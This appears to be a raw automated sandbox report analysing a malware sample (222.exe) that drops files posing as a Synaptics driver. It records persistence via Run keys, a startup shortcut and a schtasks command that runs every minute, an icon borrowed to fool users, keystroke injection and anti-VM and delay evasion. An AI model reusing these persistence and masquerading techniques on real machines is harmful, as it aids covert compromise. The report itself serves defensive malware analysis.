                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeSection loaded: wsock32.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeSection loaded: kernel.appcore.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeSection loaded: windows.storage.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeSection loaded: wldp.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeSection loaded: propsys.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeSection loaded: iphlpapi.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeSection loaded: mpr.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeSection loaded: userenv.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeSection loaded: uxtheme.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeSection loaded: version.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeSection loaded: wininet.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeSection loaded: winmm.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeSection loaded: wsock32.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeSection loaded: kernel.appcore.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeSection loaded: windows.storage.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeSection loaded: wldp.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeSection loaded: propsys.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeSection loaded: iphlpapi.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeSection loaded: mpr.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeSection loaded: userenv.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeSection loaded: uxtheme.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeSection loaded: version.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeSection loaded: wininet.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeSection loaded: winmm.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeSection loaded: wsock32.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeSection loaded: kernel.appcore.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeSection loaded: windows.storage.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeSection loaded: wldp.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeSection loaded: propsys.dll
                              Source: C:\Users\user\Desktop\222.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                              Source: HBMQLS.lnk.2.drLNK file: ..\..\..\..\..\Windata\EWZJGF.exe
                              Source: C:\ProgramData\Synaptics\Synaptics.exeFile written: C:\Users\user\AppData\Local\Temp\G5hJM8Z.iniJump to behavior
                              Source: Window RecorderWindow detected: More than 3 window changes detected
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\CommonJump to behavior
                              Source: 222.exeStatic file information: File size 1723904 > 1048576
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_222.exeCode function: 2_2_008CB0C0 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,2_2_008CB0C0
                              Source: C:\Users\user\Desktop\._cache_222.exeCode function: 2_2_00768D99 push edi; retn 0000h2_2_00768D9B
                              Source: C:\Users\user\Desktop\._cache_222.exeCode function: 2_2_00768F0E push F7FFFFFFh; retn 0000h2_2_00768F13
                              Source: C:\Users\user\Desktop\._cache_222.exeCode function: 2_2_00787795 push ecx; ret 2_2_007877A8
                              Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 3_2_2171C220 pushfd ; ret 3_2_2171C221
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeCode function: 9_2_00448D99 push edi; retn 0000h9_2_00448D9B
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeCode function: 9_2_00448F0E push F7FFFFFFh; retn 0000h9_2_00448F13
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeCode function: 9_2_00467795 push ecx; ret 9_2_004677A8
                              Source: initial sampleStatic PE information: section name: UPX0
                              Source: initial sampleStatic PE information: section name: UPX1
                              Source: initial sampleStatic PE information: section name: UPX0
                              Source: initial sampleStatic PE information: section name: UPX1

                              Persistence and Installation Behavior

                              barindex
                              Drops PE files to the document folder of the user
                              Source: C:\ProgramData\Synaptics\Synaptics.exeFile created: C:\Users\user\Documents\EEGWXUHVUG\~$cache1Jump to dropped file
                              Source: C:\Users\user\Desktop\222.exeFile created: C:\ProgramData\Synaptics\RCX6FEC.tmpJump to dropped file
                              Source: C:\Users\user\Desktop\222.exeFile created: C:\Users\user\Desktop\._cache_222.exeJump to dropped file
                              Source: C:\Users\user\Desktop\222.exeFile created: C:\ProgramData\Synaptics\Synaptics.exeJump to dropped file
                              Source: C:\ProgramData\Synaptics\Synaptics.exeFile created: C:\Users\user\Documents\EEGWXUHVUG\~$cache1Jump to dropped file
                              Source: C:\Users\user\Desktop\._cache_222.exeFile created: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeJump to dropped file
                              Source: C:\Users\user\Desktop\222.exeFile created: C:\ProgramData\Synaptics\RCX6FEC.tmpJump to dropped file
                              Source: C:\Users\user\Desktop\222.exeFile created: C:\ProgramData\Synaptics\Synaptics.exeJump to dropped file
                              Source: C:\ProgramData\Synaptics\Synaptics.exeFile created: C:\Users\user\Documents\EEGWXUHVUG\~$cache1Jump to dropped file

                              Boot Survival

                              barindex
                              Uses schtasks.exe or at.exe to add and modify task schedules
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn HBMQLS.exe /tr C:\Users\user\AppData\Roaming\Windata\EWZJGF.exe /sc minute /mo 1
                              Source: C:\Users\user\Desktop\._cache_222.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HBMQLS.lnkJump to behavior
                              Source: C:\Users\user\Desktop\._cache_222.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HBMQLS.lnkJump to behavior
                              Source: C:\Users\user\Desktop\222.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Synaptics Pointing Device DriverJump to behavior
                              Source: C:\Users\user\Desktop\222.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Synaptics Pointing Device DriverJump to behavior
                              Source: C:\Users\user\Desktop\._cache_222.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run HBMQLSJump to behavior
                              Source: C:\Users\user\Desktop\._cache_222.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run HBMQLSJump to behavior

                              Hooking and other Techniques for Hiding and Protection

                              barindex
                              Icon mismatch, binary includes an icon from a different legit application in order to fool users
                              Source: initial sampleIcon embedded in binary file: icon matches a legit application icon: icon (2112).png
                              Source: C:\Users\user\Desktop\._cache_222.exeCode function: 2_2_0077F78E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,2_2_0077F78E
                              Source: C:\Users\user\Desktop\._cache_222.exeCode function: 2_2_007C7F0E IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,2_2_007C7F0E
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeCode function: 9_2_0045F78E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,9_2_0045F78E
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeCode function: 9_2_004A7F0E IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,9_2_004A7F0E
                              Source: C:\Users\user\Desktop\._cache_222.exeCode function: 2_2_00781E5A __initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,2_2_00781E5A
                              Source: C:\ProgramData\Synaptics\Synaptics.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                              Source: C:\Users\user\Desktop\222.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\._cache_222.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-Timer
                              Source: C:\Users\user\Desktop\._cache_222.exeWindow / User API: threadDelayed 5206Jump to behavior
                              Source: C:\Users\user\Desktop\._cache_222.exeWindow / User API: foregroundWindowGot 1596Jump to behavior
                              Source: C:\Users\user\Desktop\._cache_222.exeAPI coverage: 6.3 %
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeAPI coverage: 3.7 %
                              Source: C:\Users\user\Desktop\._cache_222.exe TID: 5304Thread sleep time: -52060s >= -30000sJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exe TID: 4068Thread sleep count: 78 > 30Jump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exe TID: 4068Thread sleep time: -4680000s >= -30000sJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exe TID: 8368Thread sleep time: -60000s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\._cache_222.exeLast function: Thread delayed
                              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                              Source: C:\Users\user\Desktop\._cache_222.exeThread sleep count: Count: 5206 delay: -10Jump to behavior
                              Source: Yara matchFile source: 00000007.00000002.3263095777.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000007.00000002.3264154997.00000000032E0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 6048, type: MEMORYSTR
                              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\HBMQLS.vbs, type: DROPPED
                              Source: C:\Users\user\Desktop\._cache_222.exeCode function: 2_2_0077DD92 GetFileAttributesW,FindFirstFileW,FindClose,2_2_0077DD92
                              Source: C:\Users\user\Desktop\._cache_222.exeCode function: 2_2_007B2044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_007B2044
                              Source: C:\Users\user\Desktop\._cache_222.exeCode function: 2_2_007B219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_007B219F
                              Source: C:\Users\user\Desktop\._cache_222.exeCode function: 2_2_007B24A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,2_2_007B24A9
                              Source: C:\Users\user\Desktop\._cache_222.exeCode function: 2_2_007A6B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,2_2_007A6B3F
                              Source: C:\Users\user\Desktop\._cache_222.exeCode function: 2_2_007A6E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,2_2_007A6E4A
                              Source: C:\Users\user\Desktop\._cache_222.exeCode function: 2_2_007AF350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,2_2_007AF350
                              Source: C:\Users\user\Desktop\._cache_222.exeCode function: 2_2_007AFD47 FindFirstFileW,FindClose,2_2_007AFD47
                              Source: C:\Users\user\Desktop\._cache_222.exeCode function: 2_2_007AFDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,2_2_007AFDD2
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeCode function: 9_2_00492044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,9_2_00492044
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeCode function: 9_2_0049219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,9_2_0049219F
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeCode function: 9_2_004924A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,9_2_004924A9
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeCode function: 9_2_00486B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,9_2_00486B3F
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeCode function: 9_2_00486E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,9_2_00486E4A
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeCode function: 9_2_0048F350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,9_2_0048F350
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeCode function: 9_2_0048FD47 FindFirstFileW,FindClose,9_2_0048FD47
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeCode function: 9_2_0048FDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,9_2_0048FDD2
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeCode function: 9_2_0045DD92 GetFileAttributesW,FindFirstFileW,FindClose,9_2_0045DD92
                              Source: C:\Users\user\Desktop\._cache_222.exeCode function: 2_2_0077E47B GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,2_2_0077E47B
                              Source: C:\ProgramData\Synaptics\Synaptics.exeThread delayed: delay time: 60000Jump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeThread delayed: delay time: 60000Jump to behavior
                              Source: C:\Users\user\Desktop\222.exeFile opened: C:\Users\userJump to behavior
                              Source: C:\Users\user\Desktop\222.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                              Source: C:\Users\user\Desktop\222.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                              Source: C:\Users\user\Desktop\222.exeFile opened: C:\Users\user\AppDataJump to behavior
                              Source: C:\Users\user\Desktop\222.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.iniJump to behavior
                              Source: C:\Users\user\Desktop\222.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet ExplorerJump to behavior
                              Source: Amcache.hve.20.drBinary or memory string: VMware
                              Source: Amcache.hve.20.drBinary or memory string: VMware Virtual USB Mouse
                              Source: Amcache.hve.20.drBinary or memory string: vmci.syshbin
                              Source: Amcache.hve.20.drBinary or memory string: VMware, Inc.
                              Source: Amcache.hve.20.drBinary or memory string: VMware20,1hbin@
                              Source: Amcache.hve.20.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                              Source: Amcache.hve.20.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                              Source: Amcache.hve.20.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                              Source: ._cache_222.exe, 00000002.00000002.3265916885.00000000011D7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2635210008.0000000000715000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                              Source: Amcache.hve.20.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                              Source: Synaptics.exe, 00000003.00000002.2635210008.0000000000715000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWen-GBn
                              Source: Amcache.hve.20.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                              Source: Synaptics.exe, 00000003.00000002.2635210008.00000000006BD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                              Source: Amcache.hve.20.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                              Source: Amcache.hve.20.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                              Source: Amcache.hve.20.drBinary or memory string: vmci.sys
                              Source: Amcache.hve.20.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                              Source: Amcache.hve.20.drBinary or memory string: vmci.syshbin`
                              Source: Amcache.hve.20.drBinary or memory string: \driver\vmci,\driver\pci
                              Source: ._cache_222.exe, 00000002.00000002.3265916885.00000000011D7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll.
                              Source: Amcache.hve.20.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                              Source: Amcache.hve.20.drBinary or memory string: VMware20,1
                              Source: Amcache.hve.20.drBinary or memory string: Microsoft Hyper-V Generation Counter
                              Source: Amcache.hve.20.drBinary or memory string: NECVMWar VMware SATA CD00
                              Source: Amcache.hve.20.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                              Source: Amcache.hve.20.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                              Source: Amcache.hve.20.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                              Source: Amcache.hve.20.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                              Source: Amcache.hve.20.drBinary or memory string: VMware PCI VMCI Bus Device
                              Source: Amcache.hve.20.drBinary or memory string: VMware VMCI Bus Device
